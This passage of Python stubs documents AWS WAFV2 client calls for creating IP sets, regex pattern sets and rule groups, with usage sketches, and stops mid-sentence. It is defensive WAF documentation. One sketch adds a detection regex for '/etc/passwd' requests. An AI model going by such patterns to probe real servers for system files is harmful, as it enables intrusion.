def create_ip_set(Name=None, Scope=None, Description=None, IPAddressVersion=None, Addresses=None, Tags=None):
"""
Creates an IPSet , which you use to identify web requests that originate from specific IP addresses or ranges of IP addresses. For example, if you\'re receiving a lot of requests from a range of IP addresses, you can configure AWS WAF to block them using an IPSet that lists those IP addresses.
See also: AWS API Documentation
Exceptions
:example: response = client.create_ip_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Description='string',
IPAddressVersion='IPV4'|'IPV6',
Addresses=[
'string',
],
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the IP set. You cannot change the name of an IPSet after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Description: string
:param Description: A description of the IP set that helps with identification. You cannot change the description of an IP set after you create it.
:type IPAddressVersion: string
:param IPAddressVersion: [REQUIRED]\nSpecify IPV4 or IPV6.\n
:type Addresses: list
:param Addresses: [REQUIRED]\nContains an array of strings that specify one or more IP addresses or blocks of IP addresses in Classless Inter-Domain Routing (CIDR) notation. AWS WAF supports all address ranges for IP versions IPv4 and IPv6.\nExamples:\n\nTo configure AWS WAF to allow, block, or count requests that originated from the IP address 192.0.2.44, specify 192.0.2.44/32 .\nTo configure AWS WAF to allow, block, or count requests that originated from IP addresses from 192.0.2.0 to 192.0.2.255, specify 192.0.2.0/24 .\nTo configure AWS WAF to allow, block, or count requests that originated from the IP address 1111:0000:0000:0000:0000:0000:0000:0111, specify 1111:0000:0000:0000:0000:0000:0000:0111/128 .\nTo configure AWS WAF to allow, block, or count requests that originated from IP addresses 1111:0000:0000:0000:0000:0000:0000:0000 to 1111:0000:0000:0000:ffff:ffff:ffff:ffff, specify 1111:0000:0000:0000:0000:0000:0000:0000/64 .\n\nFor more information about CIDR notation, see the Wikipedia entry Classless Inter-Domain Routing .\n\n(string) --\n\n
:type Tags: list
:param Tags: An array of key:value pairs to associate with the resource.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA collection of key:value pairs associated with an AWS resource. The key:value pair can be anything you define. Typically, the tag key represents a category (such as 'environment') and the tag value represents a specific value within that category (such as 'test,' 'development,' or 'production'). You can add up to 50 tags to each AWS resource.\n\nKey (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag key to describe a category of information, such as 'customer.' Tag keys are case-sensitive.\n\nValue (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag value to describe a specific value within a category, such as 'companyA' or 'companyB.' Tag values are case-sensitive.\n\n\n\n\n
:rtype: dict
Returns
Response Syntax
{
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
Response Structure
(dict) --
Summary (dict) --
High-level information about an IPSet , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage an IPSet , and the ARN, that you provide to the IPSetReferenceStatement to use the address set in a Rule .
Name (string) --
The name of the IP set. You cannot change the name of an IPSet after you create it.
Id (string) --
A unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the IP set that helps with identification. You cannot change the description of an IP set after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
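# --- Usage sketch (not part of the generated stubs) ----------------------
# A minimal, hedged example of create_ip_set followed by the optimistic-
# locking flow described in the docstring above: get_ip_set returns a
# LockToken, which update_ip_set requires; a stale token raises
# WAFOptimisticLockException. The set name, description, and addresses
# below are hypothetical, and the get/update calls assume the standard
# boto3 wafv2 client.
def _example_create_and_update_ip_set():
    import boto3
    client = boto3.client('wafv2', region_name='us-east-1')
    created = client.create_ip_set(
        Name='blocked-addresses',  # hypothetical name
        Scope='REGIONAL',
        Description='Addresses observed sending abusive traffic',
        IPAddressVersion='IPV4',
        Addresses=['192.0.2.44/32', '192.0.2.0/24'],  # CIDR notation, as documented above
    )
    summary = created['Summary']
    # Fetch the current state and its LockToken before updating; if the
    # token turns out to be stale, update_ip_set fails and you repeat the get.
    current = client.get_ip_set(Name=summary['Name'], Scope='REGIONAL', Id=summary['Id'])
    client.update_ip_set(
        Name=summary['Name'],
        Scope='REGIONAL',
        Id=summary['Id'],
        Addresses=current['IPSet']['Addresses'] + ['198.51.100.0/24'],
        LockToken=current['LockToken'],
    )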
def create_regex_pattern_set(Name=None, Scope=None, Description=None, RegularExpressionList=None, Tags=None):
"""
Creates a RegexPatternSet, which you reference in a RegexPatternSetReferenceStatement, to have AWS WAF inspect a web request component for the specified patterns.
See also: AWS API Documentation
Exceptions
:example: response = client.create_regex_pattern_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Description='string',
RegularExpressionList=[
{
'RegexString': 'string'
},
],
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the set. You cannot change the name after you create the set.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Description: string
:param Description: A description of the set that helps with identification. You cannot change the description of a set after you create it.
:type RegularExpressionList: list
:param RegularExpressionList: [REQUIRED]\nArray of regular expression strings.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single regular expression. This is used in a RegexPatternSet .\n\nRegexString (string) --The string representing the regular expression.\n\n\n\n\n
:type Tags: list
:param Tags: An array of key:value pairs to associate with the resource.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA collection of key:value pairs associated with an AWS resource. The key:value pair can be anything you define. Typically, the tag key represents a category (such as 'environment') and the tag value represents a specific value within that category (such as 'test,' 'development,' or 'production'). You can add up to 50 tags to each AWS resource.\n\nKey (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag key to describe a category of information, such as 'customer.' Tag keys are case-sensitive.\n\nValue (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag value to describe a specific value within a category, such as 'companyA' or 'companyB.' Tag values are case-sensitive.\n\n\n\n\n
:rtype: dict
Returns
Response Syntax
{
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
Response Structure
(dict) --
Summary (dict) --
High-level information about a RegexPatternSet, returned by operations like create and list. This provides information like the ID, which you can use to retrieve and manage a RegexPatternSet, and the ARN, which you provide to the RegexPatternSetReferenceStatement to use the pattern set in a Rule.
Name (string) --
The name of the data type instance. You cannot change the name after you create the instance.
Id (string) --
A unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the set that helps with identification. You cannot change the description of a set after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException. If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
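# --- Usage sketch (not part of the generated stubs) ----------------------
# A small, hedged example of create_regex_pattern_set using only the
# parameters documented above. The name, description, and patterns are
# hypothetical; the returned ARN is what a
# RegexPatternSetReferenceStatement expects (see create_rule_group below).
def _example_create_regex_pattern_set():
    import boto3
    client = boto3.client('wafv2', region_name='us-east-1')
    response = client.create_regex_pattern_set(
        Name='suspicious-uri-patterns',  # hypothetical name
        Scope='REGIONAL',
        Description='URI fragments seen in probe traffic',
        RegularExpressionList=[
            {'RegexString': r'\.php\?'},
            {'RegexString': r'/etc/passwd'},
        ],
        Tags=[{'Key': 'environment', 'Value': 'test'}],
    )
    # Reference the set from a rule statement via its ARN.
    return response['Summary']['ARN']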
def create_rule_group(Name=None, Scope=None, Capacity=None, Description=None, Rules=None, VisibilityConfig=None, Tags=None):
"""
Creates a RuleGroup per the specifications provided.
A rule group defines a collection of rules to inspect and control web requests that you can use in a WebACL. When you create a rule group, you define an immutable capacity limit. If you update a rule group, you must stay within the capacity. This allows others to reuse the rule group with confidence in its capacity requirements.
See also: AWS API Documentation
Exceptions
:example: response = client.create_rule_group(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Capacity=123,
Description='string',
Rules=[
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {}
,
'Allow': {}
,
'Count': {}
},
'OverrideAction': {
'Count': {}
,
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
VisibilityConfig={
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the rule group. You cannot change the name of a rule group after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Capacity: integer
:param Capacity: [REQUIRED]\nThe web ACL capacity units (WCUs) required for this rule group.\nWhen you create your own rule group, you define this, and you cannot change it after creation. When you add or modify the rules in a rule group, AWS WAF enforces this limit. You can check the capacity for a set of rules using CheckCapacity .\nAWS WAF uses WCUs to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. AWS WAF calculates capacity differently for each rule type, to reflect the relative cost of each rule. Simple rules that cost little to run use fewer WCUs than more complex rules that use more processing power. Rule group capacity is fixed at creation, which helps users plan their web ACL WCU usage when they use a rule group. The WCU limit for web ACLs is 1,500.\n
:type Description: string
:param Description: A description of the rule group that helps with identification. You cannot change the description of a rule group after you create it.
:type Rules: list
:param Rules: The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\nName (string) -- [REQUIRED]The name of the rule. You can\'t change the name of a Rule after you create it.\n\nPriority (integer) -- [REQUIRED]If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.\n\nStatement (dict) -- [REQUIRED]The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .\n\nByteMatchStatement (dict) --A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is referred to as a string match statement.\n\nSearchString (bytes) -- [REQUIRED]A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.\nValid values depend on the component that you specify for inspection in FieldToMatch :\n\nMethod : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.\nUriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .\n\nIf SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.\n\nIf you\'re using the AWS WAF API\nSpecify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.\nFor example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .\n\nIf you\'re using the AWS CLI or one of the AWS SDKs\nThe value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . 
The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\nPositionalConstraint (string) -- [REQUIRED]The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:\n\nCONTAINS\nThe specified part of the web request must include the value of SearchString , but the location doesn\'t matter.\n\nCONTAINS_WORD\nThe specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:\n\nSearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .\nSearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .\n\n\nEXACTLY\nThe value of the specified part of the web request must exactly match the value of SearchString .\n\nSTARTS_WITH\nThe value of SearchString must appear at the beginning of the specified part of the web request.\n\nENDS_WITH\nThe value of SearchString must appear at the end of the specified part of the web request.\n\n\n\nSqliMatchStatement (dict) --Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. 
Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nXssMatchStatement (dict) --A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that 